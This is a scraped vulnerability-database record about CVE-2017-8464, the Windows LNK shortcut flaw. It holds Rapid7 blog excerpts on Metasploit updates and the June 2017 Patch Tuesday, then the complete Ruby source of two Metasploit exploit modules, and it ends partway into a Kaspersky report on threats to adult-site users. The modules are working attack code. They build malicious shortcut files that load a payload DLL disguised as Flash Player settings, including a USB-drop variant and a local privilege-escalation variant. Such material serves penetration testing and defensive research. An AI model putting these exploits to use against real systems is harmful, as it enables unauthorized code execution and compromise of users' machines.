style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with <code>msfupdate</code> and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-framework%2Fpulls%3Fq%3Dis%3Apr%2Bmerged%3A%25222017-07-28T09%3A59%3A11-07%3A00%2B..%2B2017-08-10T11%3A06%3A05-05%3A00%2522\" rel=\"nofollow\" target=\"_blank\">Pull Requsts 4.15.4...4.15.6</a></li><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-framework%2Fcompare%2F4.15.4...4.15.6\" rel=\"nofollow\" target=\"_blank\">Full diff 4.15.4...4.15.6</a></li></ul><p>To install fresh, check out the open-source-only <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-framework%2Fwiki%2FNightly-Installers\" rel=\"nofollow\" target=\"_blank\">Nightly Installers</a>, or the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Fmetasploit%2Fdownload.jsp\" target=\"_blank\">binary installers</a> which also include the commercial editions.</p></div><!-- [DocumentBodyEnd:3836c61a-5d77-47a8-9728-65d7e934a989] -->", "cvss3": {}, "published": "2017-08-11T20:03:59", "title": "Metasploit Wrapup", "type": "rapid7community", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-7442", "CVE-2017-8464"], "modified": "2017-08-11T20:03:59", "id": "RAPID7COMMUNITY:4FC64923DC47E63250AA753E591FC7A7", "href": "https://community.rapid7.com/community/metasploit/blog/2017/08/11/metasploit-wrapup", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-06-27T11:16:57", "description": "<!-- [DocumentBodyStart:f6326a4d-b6b0-402e-9ffb-8eebecb2bf70] --><div class=\"jive-rendered-content\"><p>This month sees another spate of <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fportal.msrc.microsoft.com%2Fen-us%2Fsecurity-guidance%2Freleasenotedetail%2F40969d56-1b2a-e711-80db-000d3a32fc99\" rel=\"nofollow\" target=\"_blank\">critical fixes</a> from Microsoft, including patches for a number of Remote Code Execution (RCE) vulnerabilities. Two of these are already known to be exploited in the wild (<a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fportal.msrc.microsoft.com%2Fen-US%2Fsecurity-guidance%2Fadvisory%2FCVE-2017-8543\" rel=\"nofollow\" target=\"_blank\">CVE-2017-8543</a> and <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fportal.msrc.microsoft.com%2Fen-US%2Fsecurity-guidance%2Fadvisory%2FCVE-2017-8464\" rel=\"nofollow\" target=\"_blank\">CVE-2017-8464</a>). Today's patches are so crucial that Microsoft has once again released <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fblogs.technet.microsoft.com%2Fmsrc%2F2017%2F06%2F13%2Fjune-2017-security-update-release%2F\" rel=\"nofollow\" target=\"_blank\">fixes for end-of-life operating systems</a>, citing \"the elevated risk for destructive cyber attacks at this time,\" and explicitly calling out the threat of nation-state actors. Updates are available for Windows XP, Windows Vista, Windows 8, and Windows Server 2003. They include fixes for <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Ftechnet.microsoft.com%2Fen-us%2Flibrary%2Fsecurity%2Fms17-013.aspx\" rel=\"nofollow\" target=\"_blank\">MS17-013</a> (a Security Bulletin from April), as well as 21 CVEs with impact ranging across RCE, information disclosure, and elevation of privilege. Further details are available in Microsoft's <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Ftechnet.microsoft.com%2Fen-us%2Flibrary%2Fsecurity%2F4025685.aspx\" rel=\"nofollow\" target=\"_blank\">Security Advisory 4025685</a>.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>This month's updates aren't just about severity, but quantity as well, with 94 separate flaws being patched (compared to 66 last month, and 44 in April). This doesn't even include the nine critical <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fportal.msrc.microsoft.com%2Fen-US%2Fsecurity-guidance%2Fadvisory%2FADV170007\" rel=\"nofollow\" target=\"_blank\">Adobe Flash Player RCE vulnerabilities</a> (see <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fhelpx.adobe.com%2Fsecurity%2Fproducts%2Fflash-player%2Fapsb17-17.html\" rel=\"nofollow\" target=\"_blank\">APSB17-17</a> for details) that are also being fixed today and are rated \"Priority 1\" (meaning there is a high risk of vulnerable systems being targeted in the wild).</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>Most of the vulnerabilities are for Windows, split evenly between desktop and server flavors. All of the Windows CVEs have a severity of Important or Critical, with the bulk of impact being information disclosure, followed by RCE, privilege escalation, and some security feature bypass vulnerabilities in newer versions of Windows (8.1, 10, Server 2012 R2, and Server 2016).</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>Microsoft Office and Office-related software (e.g. SharePoint, Lync/Skype for Business, and Office Web Apps) also have plenty of vulnerabilities being addressed this month, with thirteen information disclosure vulnerabilities and twelve RCEs between them all. In addition to various RCE vulnerabilities for SharePoint being patched, Microsoft has released a <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fportal.msrc.microsoft.com%2Fen-US%2Fsecurity-guidance%2Fadvisory%2FADV170008\" rel=\"nofollow\" target=\"_blank\">defense-in-depth</a> update for SharePoint Enterprise Server 2013 SP1 and Enterprise Server 2016 that harden the products without addressing specific vulnerabilities.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>As usual, web technologies continue to provide additional attack surface. 16 issues with the Edge browser have been patched: 10 RCE, 3 information disclosure and 3 security feature bypass vulnerabilities. Internet Explorer sees 4 RCE and 2 information disclosure bugs being fixed. Last but not least, two critical RCE vulnerabilities in Silverlight have also been patched (<a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fportal.msrc.microsoft.com%2Fen-us%2Fsecurity-guidance%2Fadvisory%2FCVE-2017-0283\" rel=\"nofollow\" target=\"_blank\">CVE-2017-0283</a> and <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fportal.msrc.microsoft.com%2Fen-US%2Fsecurity-guidance%2Fadvisory%2FCVE-2017-8527\" rel=\"nofollow\" target=\"_blank\">CVE-2017-8527</a>, each of which also affects several other products).</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>Hopefully you don't have any obsolete operating systems in your environment. But if you do, be sure to apply this month's patches as attackers often see end-of-life systems as low-hanging fruit, and exploits are already out there. Of course, this means supported systems are also at significant risk. Best get patching!</p></div><!-- [DocumentBodyEnd:f6326a4d-b6b0-402e-9ffb-8eebecb2bf70] -->", "cvss3": {}, "published": "2017-06-14T12:04:23", "title": "Patch Tuesday - June 2017", "type": "rapid7community", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-8464", "CVE-2017-8543", "CVE-2017-0283", "CVE-2017-8527"], "modified": "2017-06-14T12:04:23", "href": "https://community.rapid7.com/community/nexpose/blog/2017/06/14/patch-tuesday-june-2017", "id": "RAPID7COMMUNITY:5EEA40487C97CFD1AC5560D7EB4368F6", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2023-01-02T12:00:09", "description": "This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain a dynamic icon, loaded from a malicious DLL. This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is similar except an additional SpecialFolderDataBlock is included. The folder ID set in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary DLL file. The PATH option must be an absolute path to a writeable directory which is indexed for searching. If no PATH is specified, the module defaults to %USERPROFILE%.\n", "cvss3": {}, "published": "2017-10-05T14:16:31", "type": "metasploit", "title": "LNK Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0096", "CVE-2017-8464"], "modified": "2021-10-06T12:54:51", "id": "MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2017_8464_LNK_LPE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/local/cve_2017_8464_lnk_lpe/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n\n attr_accessor :exploit_dll_name\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'LNK Code Execution Vulnerability',\n 'Description' => %q{\n This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)\n that contain a dynamic icon, loaded from a malicious DLL.\n\n This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is\n similar except an additional SpecialFolderDataBlock is included. The folder ID set\n in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass\n the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary\n DLL file.\n\n The PATH option must be an absolute path to a writeable directory which is indexed for\n searching. If no PATH is specified, the module defaults to %USERPROFILE%.\n },\n 'Author' => [\n 'Uncredited', # vulnerability discovery\n 'Yorick Koster', # msf module\n 'Spencer McIntyre' # msf module\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2017-8464'],\n ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464'],\n ['URL', 'http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt'], # writeup\n ['URL', 'https://msdn.microsoft.com/en-us/library/dd871305.aspx'], # [MS-SHLLINK]: Shell Link (.LNK) Binary File Format\n ['URL', 'http://www.geoffchappell.com/notes/security/stuxnet/ctrlfldr.htm'],\n ['URL', 'https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf']\n ],\n 'DefaultOptions' => {\n 'EXITFUNC' => 'process',\n 'FileDropperDelay' => 15,\n 'WfsDelay' => 30\n },\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Payload' => {\n 'Space' => 2048\n },\n 'Platform' => 'win',\n 'Targets' => [\n [ 'Windows x64', { 'Arch' => ARCH_X64 } ],\n [ 'Windows x86', { 'Arch' => ARCH_X86 } ]\n ],\n 'DefaultTarget' => 0, # Default target is Automatic\n 'DisclosureDate' => '2017-06-13',\n 'Notes' => {\n 'Stability' => [ CRASH_SERVICE_RESTARTS, ],\n 'SideEffects' => [ ARTIFACTS_ON_DISK, ],\n },\n 'Compat' => {\n 'Meterpreter' => {\n 'Commands' => %w[\n stdapi_sys_config_getenv\n ]\n }\n },\n )\n )\n\n register_options(\n [\n OptString.new('FILENAME', [false, 'The LNK file']),\n OptString.new('DLLNAME', [false, 'The DLL file containing the payload']),\n OptString.new('PATH', [false, 'An explicit path to where the files should be written to'])\n ]\n )\n\n register_advanced_options(\n [\n OptString.new('LnkComment', [true, 'The comment to use in the generated LNK file', 'Manage Flash Player Settings']),\n OptString.new('LnkDisplayName', [true, 'The display name to use in the generated LNK file', 'Flash Player'])\n ]\n )\n end\n\n def check\n if session.sys.process['SearchIndexer.exe']\n return Exploit::CheckCode::Detected\n end\n\n Exploit::CheckCode::Safe\n end\n\n def get_name(option, default_ext)\n name = datastore[option].to_s.strip\n name = \"#{rand_text_alpha(16)}.#{default_ext}\" if name.blank?\n name\n end\n\n def exploit\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n\n if session.platform != 'windows'\n fail_with(Failure::NoTarget, 'This exploit requires a native Windows meterpreter session')\n end\n\n if check == Exploit::CheckCode::Safe\n fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')\n end\n\n if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86\n fail_with(Failure::NoTarget, 'Running against WOW64 is not supported, please get an x64 session')\n elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86\n fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')\n elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64\n fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')\n end\n\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2017-8464')\n arch = target['Arch'] == ARCH_ANY ? payload.arch.first : target['Arch']\n datastore['EXE::Path'] = path\n datastore['EXE::Template'] = ::File.join(path, \"template_#{arch}_windows.dll\")\n\n path = datastore['PATH'] || session.sys.config.getenv('USERPROFILE')\n path.chomp!(\"\\\\\")\n\n dll_path = \"#{path}\\\\#{get_name('DLLNAME', 'dll')}\"\n write_file(dll_path, generate_payload_dll)\n\n lnk_path = \"#{path}\\\\#{get_name('FILENAME', 'lnk')}\"\n write_file(lnk_path, generate_link(dll_path))\n register_files_for_cleanup(dll_path, lnk_path)\n end\n\n def file_rm(file)\n if file_dropper_delete(session, file) && @dropped_files && file_dropper_deleted?(session, file, true)\n @dropped_files.delete(file)\n end\n end\n\n def generate_link(path)\n vprint_status(\"Generating LNK file to load: #{path}\")\n path += \"\\x00\" # Do not use << here\n display_name = datastore['LnkDisplayName'].dup << \"\\x00\" # LNK Display Name\n comment = datastore['LnkComment'].dup << \"\\x00\"\n\n # Control Panel Applet ItemID with our DLL\n cpl_applet = [\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00\n ].pack('C*')\n cpl_applet << [path.length].pack('v')\n cpl_applet << [display_name.length].pack('v')\n cpl_applet << path.unpack('C*').pack('v*')\n cpl_applet << display_name.unpack('C*').pack('v*')\n cpl_applet << comment.unpack('C*').pack('v*')\n\n # LinkHeader\n ret = [\n 0x4c, 0x00, 0x00, 0x00, # HeaderSize, must be 0x0000004C\n 0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, # LinkCLSID, must be 00021401-0000-0000-C000-000000000046\n 0x81, 0x00, 0x00, 0x00, # LinkFlags (HasLinkTargetIDList | IsUnicode)\n 0x00, 0x00, 0x00, 0x00, # FileAttributes\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # CreationTime\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # AccessTime\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # WriteTime\n 0x00, 0x00, 0x00, 0x00, # FileSize\n 0x00, 0x00, 0x00, 0x00, # IconIndex\n 0x00, 0x00, 0x00, 0x00, # ShowCommand\n 0x00, 0x00, # HotKey\n 0x00, 0x00, # Reserved1\n 0x00, 0x00, 0x00, 0x00, # Reserved2\n 0x00, 0x00, 0x00, 0x00 # Reserved3\n ].pack('C*')\n\n # IDList\n idlist_data = ''\n # ItemID = ItemIDSize (2 bytes) + Data (variable)\n idlist_data << [0x12 + 2].pack('v')\n idlist_data << [\n # All Control Panel Items\n 0x1f, 0x80, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30,\n 0x30, 0x9d\n ].pack('C*')\n # ItemID = ItemIDSize (2 bytes) + Data (variable)\n idlist_data << [cpl_applet.length + 2].pack('v')\n idlist_data << cpl_applet\n idlist_data << [0x00].pack('v') # TerminalID\n\n # LinkTargetIDList\n ret << [idlist_data.length].pack('v') # IDListSize\n ret << idlist_data\n\n # ExtraData\n # SpecialFolderDataBlock\n ret << [\n 0x10, 0x00, 0x00, 0x00, # BlockSize\n 0x05, 0x00, 0x00, 0xA0, # BlockSignature 0xA0000005\n 0x03, 0x00, 0x00, 0x00, # SpecialFolderID (CSIDL_CONTROLS - My Computer\\Control Panel)\n 0x14, 0x00, 0x00, 0x00 # Offset in LinkTargetIDList\n ].pack('C*')\n # TerminalBlock\n ret << [0x00, 0x00, 0x00, 0x00].pack('V')\n ret\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-02T12:00:12", "description": "This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain a dynamic icon, loaded from a malicious DLL. This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is similar except an additional SpecialFolderDataBlock is included. The folder ID set in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary DLL file. If no PATH is specified, the module will use drive letters D through Z so the files may be placed in the root path of a drive such as a shared VM folder or USB drive.\n", "cvss3": {}, "published": "2017-08-02T20:46:30", "type": "metasploit", "title": "LNK Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0096", "CVE-2017-8464"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT-WINDOWS-FILEFORMAT-CVE_2017_8464_LNK_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/fileformat/cve_2017_8464_lnk_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::EXE\n\n attr_accessor :exploit_dll_name\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'LNK Code Execution Vulnerability',\n 'Description' => %q{\n This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)\n that contain a dynamic icon, loaded from a malicious DLL.\n\n This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is\n similar except an additional SpecialFolderDataBlock is included. The folder ID set\n in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass\n the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary\n DLL file.\n\n If no PATH is specified, the module will use drive letters D through Z so the files\n may be placed in the root path of a drive such as a shared VM folder or USB drive.\n },\n 'Author' =>\n [\n 'Uncredited', # vulnerability discovery\n 'Yorick Koster', # msf module\n 'Spencer McIntyre' # msf module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2017-8464'],\n ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464'],\n ['URL', 'http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt'], # writeup\n ['URL', 'https://msdn.microsoft.com/en-us/library/dd871305.aspx'], # [MS-SHLLINK]: Shell Link (.LNK) Binary File Format\n ['URL', 'http://www.geoffchappell.com/notes/security/stuxnet/ctrlfldr.htm'],\n ['URL', 'https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf']\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'DisablePayloadHandler' => true\n },\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Payload' =>\n {\n 'Space' => 2048\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', { 'Arch' => ARCH_ANY } ],\n [ 'Windows x64', { 'Arch' => ARCH_X64 } ],\n [ 'Windows x86', { 'Arch' => ARCH_X86 } ]\n ],\n 'DefaultTarget' => 0, # Default target is Automatic\n 'DisclosureDate' => '2017-06-13',\n 'Notes' =>\n {\n 'Stability' => [ CRASH_SERVICE_RESTARTS, ],\n },\n )\n )\n\n register_options(\n [\n OptString.new('FILENAME', [false, 'The LNK file', 'Flash Player.lnk']),\n OptString.new('DLLNAME', [false, 'The DLL file containing the payload', 'FlashPlayerCPLApp.cpl']),\n OptString.new('PATH', [false, 'An explicit path to where the files will be hosted'])\n ]\n )\n\n register_advanced_options(\n [\n OptString.new('LnkComment', [true, 'The comment to use in the generated LNK file', 'Manage Flash Player Settings']),\n OptString.new('LnkDisplayName', [true, 'The display name to use in the generated LNK file', 'Flash Player'])\n ]\n )\n end\n\n def exploit\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2017-8464')\n arch = target['Arch'] == ARCH_ANY ? payload.arch.first : target['Arch']\n datastore['EXE::Path'] = path\n datastore['EXE::Template'] = ::File.join(path, \"template_#{arch}_windows.dll\")\n\n dll = generate_payload_dll\n dll_name = datastore['DLLNAME'] || \"#{rand_text_alpha(16)}.dll\"\n dll_path = store_file(dll, dll_name)\n print_status(\"#{dll_path} created, copy it to the root folder of the target USB drive\")\n\n if datastore['PATH']\n lnk = generate_link(\"#{datastore['PATH'].chomp(\"\\\\\")}\\\\#{dll_name}\")\n lnk_filename = datastore['FILENAME'] || \"#{rand_text_alpha(16)}.lnk\"\n lnk_path = store_file(lnk, lnk_filename)\n print_status(\"#{lnk_path} created, copy to the target paths\")\n\n else\n # HACK: Create LNK files to different drives instead\n # Copying all the LNK files will likely trigger this vulnerability\n ('D'..'Z').each do |i|\n fname, ext = (datastore['FILENAME'] || \"#{rand_text_alpha(16)}.lnk\").split('.')\n ext = 'lnk' if ext.nil?\n lnk_filename = \"#{fname}_#{i}.#{ext}\"\n lnk = generate_link(\"#{i}:\\\\#{dll_name}\")\n lnk_path = store_file(lnk, lnk_filename)\n print_status(\"#{lnk_path} created, copy to the target USB drive\")\n end\n end\n end\n\n def generate_link(path)\n vprint_status(\"Generating LNK file to load: #{path}\")\n path << \"\\x00\"\n display_name = datastore['LnkDisplayName'].dup << \"\\x00\" # LNK Display Name\n comment = datastore['LnkComment'].dup << \"\\x00\"\n\n # Control Panel Applet ItemID with our DLL\n cpl_applet = [\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00\n ].pack('C*')\n cpl_applet << [path.length].pack('v')\n cpl_applet << [display_name.length].pack('v')\n cpl_applet << path.unpack('C*').pack('v*')\n cpl_applet << display_name.unpack('C*').pack('v*')\n cpl_applet << comment.unpack('C*').pack('v*')\n\n # LinkHeader\n ret = [\n 0x4c, 0x00, 0x00, 0x00, # HeaderSize, must be 0x0000004C\n 0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, # LinkCLSID, must be 00021401-0000-0000-C000-000000000046\n 0x81, 0x00, 0x00, 0x00, # LinkFlags (HasLinkTargetIDList | IsUnicode)\n 0x00, 0x00, 0x00, 0x00, # FileAttributes\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # CreationTime\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # AccessTime\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # WriteTime\n 0x00, 0x00, 0x00, 0x00, # FileSize\n 0x00, 0x00, 0x00, 0x00, # IconIndex\n 0x00, 0x00, 0x00, 0x00, # ShowCommand\n 0x00, 0x00, # HotKey\n 0x00, 0x00, # Reserved1\n 0x00, 0x00, 0x00, 0x00, # Reserved2\n 0x00, 0x00, 0x00, 0x00 # Reserved3\n ].pack('C*')\n\n # IDList\n idlist_data = ''\n # ItemID = ItemIDSize (2 bytes) + Data (variable)\n idlist_data << [0x12 + 2].pack('v')\n idlist_data << [\n # All Control Panel Items\n 0x1f, 0x80, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30,\n 0x30, 0x9d\n ].pack('C*')\n # ItemID = ItemIDSize (2 bytes) + Data (variable)\n idlist_data << [cpl_applet.length + 2].pack('v')\n idlist_data << cpl_applet\n idlist_data << [0x00].pack('v') # TerminalID\n\n # LinkTargetIDList\n ret << [idlist_data.length].pack('v') # IDListSize\n ret << idlist_data\n\n # ExtraData\n # SpecialFolderDataBlock\n ret << [\n 0x10, 0x00, 0x00, 0x00, # BlockSize\n 0x05, 0x00, 0x00, 0xA0, # BlockSignature 0xA0000005\n 0x03, 0x00, 0x00, 0x00, # SpecialFolderID (CSIDL_CONTROLS - My Computer\\Control Panel)\n 0x14, 0x00, 0x00, 0x00 # Offset in LinkTargetIDList\n ].pack('C*')\n # TerminalBlock\n ret << [0x00, 0x00, 0x00, 0x00].pack('V')\n ret\n end\n\n # Store the file in the MSF local directory (eg, /root/.msf4/local/)\n def store_file(data, filename)\n @ltype = \"exploit.fileformat.#{@shortname}\"\n\n if !::File.directory?(Msf::Config.local_directory)\n FileUtils.mkdir_p(Msf::Config.local_directory)\n end\n\n if filename && !filename.empty?\n fname, ext = filename.split('.')\n else\n fname = \"local_#{Time.now.utc.to_i}\"\n end\n\n fname = ::File.split(fname).last\n\n fname.gsub!(/[^a-z0-9\\.\\_\\-]+/i, '')\n fname << \".#{ext}\"\n\n path = File.join(\"#{Msf::Config.local_directory}/\", fname)\n full_path = ::File.expand_path(path)\n File.open(full_path, \"wb\") { |fd| fd.write(data) }\n\n full_path.dup\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2019-03-13T12:52:04", "description": "\n\n[ **More graphs and statistics in full PDF version**](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/13112943/Threats_to_users_of_adult_websites_2018.pdf>)\n\n## Introduction\n\n2018 was a year that saw campaigns to decrease online pornographic content and traffic. For example, one of the most adult-content friendly platforms \u2013 Tumblr \u2013 announced it was [banning erotic content ](<https://www.theverge.com/2018/12/5/18126451/tumblr-porn-social-media-ban>) (even though [almost a quarter](<https://motherboard.vice.com/en_us/article/4xa8v3/so-how-much-porn-is-on-tumblr>) of its users consume adult content). In addition, the UK received the title of '[The Second Most Porn-Hungry Country in the World](<http://www.gizmodo.co.uk/2018/12/the-uk-is-still-the-second-most-porn-hungry-country-in-the-world-according-to-pornhub/>)' and is now [implementing a law on age-verification for pornography lovers](<https://uk.news.yahoo.com/porn-sites-will-require-proof-age-april-next-year-123901041.html>) that will prohibit anyone below the age of 18 to watch this sort of content. This is potentially[ opening a world of new tricks](<https://news.sky.com/story/academics-doubt-value-of-online-porn-age-checks-10952614https:/news.sky.com/story/academics-doubt-value-of-online-porn-age-checks-10952614>) for scammers and threat actors to take advantage of users. In addition, even commercial giant Starbucks [declared a 'holy war' on porn](<https://www.nbcnews.com/news/us-news/starbucks-says-it-will-start-blocking-pornography-its-stores-wi-n941646>) as it was revealed that many visitors prefer to have their coffee while consuming adult content, rather than listening to music or reading the latest headlines on news websites.\n\nSuch measures might well be valid, at least from a cybersecurity perspective, as the following example suggests. According to news reports last year, an extremely active [adult website user](<https://www.oversight.gov/sites/default/files/oig-reports/ManagementAdvisory%20_USGSITSecurityVulnerabilities_101718_0.pdf>), who turned out to be a government employee, dramatically failed to keep his hobby outside of the workplace. By accessing more than 9,000 web pages with adult content, he compromised his device and subsequently infected the entire network with malware, leaving it vulnerable to spyware attacks. This, and other examples confirm that adult content remains a controversial topic from both a social and cybersecurity standpoint.\n\nIt is no secret that digital pornography has long been associated with malware and cyberthreats. While [some](<https://www.kaspersky.com/blog/porno-danger-fact-or-fiction/21865/>) of these stories are now shown to be myths, others are very legitimate. A year ago, we conducted [research](<https://www.kaspersky.com/blog/porn-themed-threats-report/20891/>) on the malware hidden in pornography and found out that such threats are both real and effective. One of the key takeaways of last year's report was the fact that cybercriminals not only use adult content in multiple ways \u2013 from lucrative decoys to make victims install malicious applications on their devices, to topical fraud schemes used to steal victims' banking credentials and other personal information \u2013 but they also make money by stealing access to pornographic websites and 